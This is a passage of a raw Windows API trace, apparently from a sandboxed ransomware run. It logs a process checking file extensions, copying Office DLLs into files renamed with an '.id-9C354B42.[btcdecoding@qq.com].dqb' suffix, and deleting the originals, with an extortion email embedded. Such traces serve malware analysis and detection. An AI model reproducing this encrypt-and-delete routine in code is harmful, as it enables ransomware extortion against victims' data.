(lpString=".xlsx") returned 5 [0057.080] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0057.081] lstrlenW (lpString=".ppt") returned 4 [0057.082] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.086] lstrlenW (lpString=".zip") returned 4 [0057.087] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.088] lstrlenW (lpString=".rar") returned 4 [0057.089] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.090] lstrlenW (lpString=".bz2") returned 4 [0057.091] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.092] lstrlenW (lpString=".7z") returned 3 [0057.093] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.095] lstrlenW (lpString=".dbf") returned 4 [0057.096] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.098] lstrlenW (lpString=".1cd") returned 4 [0057.099] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.101] lstrlenW (lpString=".jpg") returned 4 [0057.102] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.113] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0057.115] lstrlenW (lpString="ACERCLR.DLL") returned 11 [0057.116] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0058.082] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=55744) returned 1 [0058.082] CloseHandle (hObject=0x204) returned 1 [0058.082] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 0x20 [0058.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0058.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0058.083] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.083] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.083] GetLastError () returned 0x0 [0058.083] ReadFile (in: hFile=0x204, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xd9c0, lpOverlapped=0x0) returned 1 [0058.156] WriteFile (in: hFile=0x180, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xd9d0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xd9d0, lpOverlapped=0x0) returned 1 [0058.158] ReadFile (in: hFile=0x204, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.158] WriteFile (in: hFile=0x180, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0058.158] SetEndOfFile (hFile=0x180) returned 1 [0058.158] CloseHandle (hObject=0x180) returned 1 [0058.158] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.158] SetEndOfFile (hFile=0x204) returned 1 [0058.159] CloseHandle (hObject=0x204) returned 1 [0058.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.160] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 1 [0058.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.198] lstrlenW (lpString=".doc") returned 4 [0058.198] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.198] lstrlenW (lpString=".docx") returned 5 [0058.198] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.198] lstrlenW (lpString=".pdf") returned 4 [0058.198] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.198] lstrlenW (lpString=".xls") returned 4 [0058.198] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.198] lstrlenW (lpString=".xlsx") returned 5 [0058.198] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.198] lstrlenW (lpString=".ppt") returned 4 [0058.198] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.198] lstrlenW (lpString=".zip") returned 4 [0058.198] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.198] lstrlenW (lpString=".rar") returned 4 [0058.198] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.198] lstrlenW (lpString=".bz2") returned 4 [0058.198] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.198] lstrlenW (lpString=".7z") returned 3 [0058.198] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.198] lstrlenW (lpString=".dbf") returned 4 [0058.198] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.198] lstrlenW (lpString=".1cd") returned 4 [0058.198] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.198] lstrlenW (lpString=".jpg") returned 4 [0058.198] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.199] lstrlenW (lpString=".doc") returned 4 [0058.199] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.199] lstrlenW (lpString=".docx") returned 5 [0058.199] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.199] lstrlenW (lpString=".pdf") returned 4 [0058.199] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.199] lstrlenW (lpString=".xls") returned 4 [0058.199] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.199] lstrlenW (lpString=".xlsx") returned 5 [0058.199] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.199] lstrlenW (lpString=".ppt") returned 4 [0058.199] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.199] lstrlenW (lpString=".zip") returned 4 [0058.199] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.199] lstrlenW (lpString=".rar") returned 4 [0058.199] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.199] lstrlenW (lpString=".bz2") returned 4 [0058.199] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.199] lstrlenW (lpString=".7z") returned 3 [0058.199] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.199] lstrlenW (lpString=".dbf") returned 4 [0058.199] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.199] lstrlenW (lpString=".1cd") returned 4 [0058.199] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0058.199] lstrlenW (lpString=".jpg") returned 4 [0058.199] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.200] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0058.200] lstrlenW (lpString="ACEXBE.DLL") returned 10 [0058.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0060.111] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=502168) returned 1 [0060.111] CloseHandle (hObject=0x180) returned 1 [0060.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll")) returned 0x20 [0060.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0060.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0060.111] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.111] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0060.950] GetLastError () returned 0x0 [0060.950] ReadFile (in: hFile=0x180, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x7a998, lpOverlapped=0x0) returned 1 [0061.610] WriteFile (in: hFile=0x15c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x7a9a0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x7a9a0, lpOverlapped=0x0) returned 1 [0061.618] ReadFile (in: hFile=0x180, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0061.618] WriteFile (in: hFile=0x15c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0061.618] SetEndOfFile (hFile=0x15c) returned 1 [0061.618] CloseHandle (hObject=0x15c) returned 1 [0061.618] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.618] SetEndOfFile (hFile=0x180) returned 1 [0061.622] CloseHandle (hObject=0x180) returned 1 [0061.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.622] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll")) returned 1 [0061.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.622] lstrlenW (lpString=".doc") returned 4 [0061.622] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString=".docx") returned 5 [0061.623] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0061.623] lstrlenW (lpString=".pdf") returned 4 [0061.623] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString=".xls") returned 4 [0061.623] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString=".xlsx") returned 5 [0061.623] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0061.623] lstrlenW (lpString=".ppt") returned 4 [0061.623] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.623] lstrlenW (lpString=".zip") returned 4 [0061.623] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString=".rar") returned 4 [0061.623] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString=".bz2") returned 4 [0061.623] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.623] lstrlenW (lpString=".7z") returned 3 [0061.623] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.623] lstrlenW (lpString=".dbf") returned 4 [0061.623] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.623] lstrlenW (lpString=".1cd") returned 4 [0061.623] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.623] lstrlenW (lpString=".jpg") returned 4 [0061.623] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.623] lstrlenW (lpString=".doc") returned 4 [0061.623] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.623] lstrlenW (lpString=".docx") returned 5 [0061.624] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0061.624] lstrlenW (lpString=".pdf") returned 4 [0061.624] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.624] lstrlenW (lpString=".xls") returned 4 [0061.624] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.624] lstrlenW (lpString=".xlsx") returned 5 [0061.624] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0061.624] lstrlenW (lpString=".ppt") returned 4 [0061.624] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.624] lstrlenW (lpString=".zip") returned 4 [0061.624] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.624] lstrlenW (lpString=".rar") returned 4 [0061.624] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.624] lstrlenW (lpString=".bz2") returned 4 [0061.624] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.624] lstrlenW (lpString=".7z") returned 3 [0061.624] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.624] lstrlenW (lpString=".dbf") returned 4 [0061.624] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.624] lstrlenW (lpString=".1cd") returned 4 [0061.624] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0061.624] lstrlenW (lpString=".jpg") returned 4 [0061.624] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.624] lstrcmpiW (lpString1=".ODF", lpString2=".dqb") returned 1 [0061.624] lstrlenW (lpString="OFFICE.ODF") returned 10 [0061.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0061.625] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=4297568) returned 1 [0061.625] CloseHandle (hObject=0x180) returned 1 [0061.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf")) returned 0x20 [0061.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0061.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0061.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0061.626] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[btcdecoding@qq.com].dqb"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf")) returned 1 [0061.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.626] lstrlenW (lpString=".doc") returned 4 [0061.626] lstrcmpiW (lpString1=".doc", lpString2=".ODF") returned -1 [0061.626] lstrlenW (lpString=".docx") returned 5 [0061.626] lstrcmpiW (lpString1=".docx", lpString2="E.ODF") returned -1 [0061.626] lstrlenW (lpString=".pdf") returned 4 [0061.626] lstrcmpiW (lpString1=".pdf", lpString2=".ODF") returned 1 [0061.627] lstrlenW (lpString=".xls") returned 4 [0061.627] lstrcmpiW (lpString1=".xls", lpString2=".ODF") returned 1 [0061.627] lstrlenW (lpString=".xlsx") returned 5 [0061.627] lstrcmpiW (lpString1=".xlsx", lpString2="E.ODF") returned -1 [0061.627] lstrlenW (lpString=".ppt") returned 4 [0061.627] lstrcmpiW (lpString1=".ppt", lpString2=".ODF") returned 1 [0061.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.627] lstrlenW (lpString=".zip") returned 4 [0061.627] lstrcmpiW (lpString1=".zip", lpString2=".ODF") returned 1 [0061.627] lstrlenW (lpString=".rar") returned 4 [0061.627] lstrcmpiW (lpString1=".rar", lpString2=".ODF") returned 1 [0061.627] lstrlenW (lpString=".bz2") returned 4 [0061.627] lstrcmpiW (lpString1=".bz2", lpString2=".ODF") returned -1 [0061.627] lstrlenW (lpString=".7z") returned 3 [0061.627] lstrcmpiW (lpString1=".7z", lpString2="ODF") returned -1 [0061.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.627] lstrlenW (lpString=".dbf") returned 4 [0061.627] lstrcmpiW (lpString1=".dbf", lpString2=".ODF") returned -1 [0061.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.627] lstrlenW (lpString=".1cd") returned 4 [0061.627] lstrcmpiW (lpString1=".1cd", lpString2=".ODF") returned -1 [0061.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.627] lstrlenW (lpString=".jpg") returned 4 [0061.627] lstrcmpiW (lpString1=".jpg", lpString2=".ODF") returned -1 [0061.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.627] lstrlenW (lpString=".doc") returned 4 [0061.627] lstrcmpiW (lpString1=".doc", lpString2=".ODF") returned -1 [0061.628] lstrlenW (lpString=".docx") returned 5 [0061.628] lstrcmpiW (lpString1=".docx", lpString2="E.ODF") returned -1 [0061.628] lstrlenW (lpString=".pdf") returned 4 [0061.628] lstrcmpiW (lpString1=".pdf", lpString2=".ODF") returned 1 [0061.628] lstrlenW (lpString=".xls") returned 4 [0061.628] lstrcmpiW (lpString1=".xls", lpString2=".ODF") returned 1 [0061.628] lstrlenW (lpString=".xlsx") returned 5 [0061.628] lstrcmpiW (lpString1=".xlsx", lpString2="E.ODF") returned -1 [0061.628] lstrlenW (lpString=".ppt") returned 4 [0061.628] lstrcmpiW (lpString1=".ppt", lpString2=".ODF") returned 1 [0061.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.628] lstrlenW (lpString=".zip") returned 4 [0061.628] lstrcmpiW (lpString1=".zip", lpString2=".ODF") returned 1 [0061.628] lstrlenW (lpString=".rar") returned 4 [0061.628] lstrcmpiW (lpString1=".rar", lpString2=".ODF") returned 1 [0061.628] lstrlenW (lpString=".bz2") returned 4 [0061.628] lstrcmpiW (lpString1=".bz2", lpString2=".ODF") returned -1 [0061.628] lstrlenW (lpString=".7z") returned 3 [0061.628] lstrcmpiW (lpString1=".7z", lpString2="ODF") returned -1 [0061.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.628] lstrlenW (lpString=".dbf") returned 4 [0061.628] lstrcmpiW (lpString1=".dbf", lpString2=".ODF") returned -1 [0061.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.628] lstrlenW (lpString=".1cd") returned 4 [0061.628] lstrcmpiW (lpString1=".1cd", lpString2=".ODF") returned -1 [0061.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0061.628] lstrlenW (lpString=".jpg") returned 4 [0061.628] lstrcmpiW (lpString1=".jpg", lpString2=".ODF") returned -1 [0061.629] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0061.629] lstrlenW (lpString="EXPSRV.DLL") returned 10 [0061.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0061.629] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x303ff1c | out: 